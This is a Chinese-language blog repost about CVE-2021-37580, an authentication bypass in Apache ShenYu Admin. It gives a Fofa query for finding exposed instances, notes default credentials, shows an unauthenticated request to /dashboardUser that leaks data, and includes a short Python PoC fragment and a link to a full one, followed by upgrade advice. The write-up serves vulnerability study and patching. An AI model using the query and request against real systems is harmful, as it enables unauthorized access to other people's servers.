分享

Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580)

 冲天香阵 2021-11-20

Apache ShenYu  JWT认证缺陷漏洞

图片

漏洞说明

        Apache ShenYu 是应用于所有微服务场景的,可扩展、高性能、响应式的 API 网关解决方案。 

        Apache ShenYu Admin 存在身份验证绕过漏洞。Shenyu Admin Bootstrap 中 JWT 的错误使用允许攻击者绕过身份验证,攻击者可通过该漏洞直接进入系统后台。 

影响版本

        Apache ShenYu 2.3.0        Apache ShenYu 2.4.0  

漏洞复现

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

body='id=\'httpPath\''&&body='th:text=\'${domain}\'' 

访问首页如下所示:(ps:大多数存在默认口令admin/123456)

图片

 开启burp进行抓包,访问path:/dashboardUser

图片

可以看到Apache ShenYu 的JWT 认证体系并未进行身份验证就返回了敏感信息

图片

就是这么的丝滑,打完收工

图片

部分代码:

def target_url(url):    target_url = url + '/dashboardUser'    headers = {       'User-Agent''Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0',        }    res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
poc地址:https://github.com/Henry4E36/apache-shenyu-authentication

运行截图:

图片

修复建议

升级至最新安全版本 Apache ShenYu 2.4.1

下载地址:https://shenyu./zh/download
图片

E N D

图片

本文章仅用于学习交流,不得用于非法用途

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多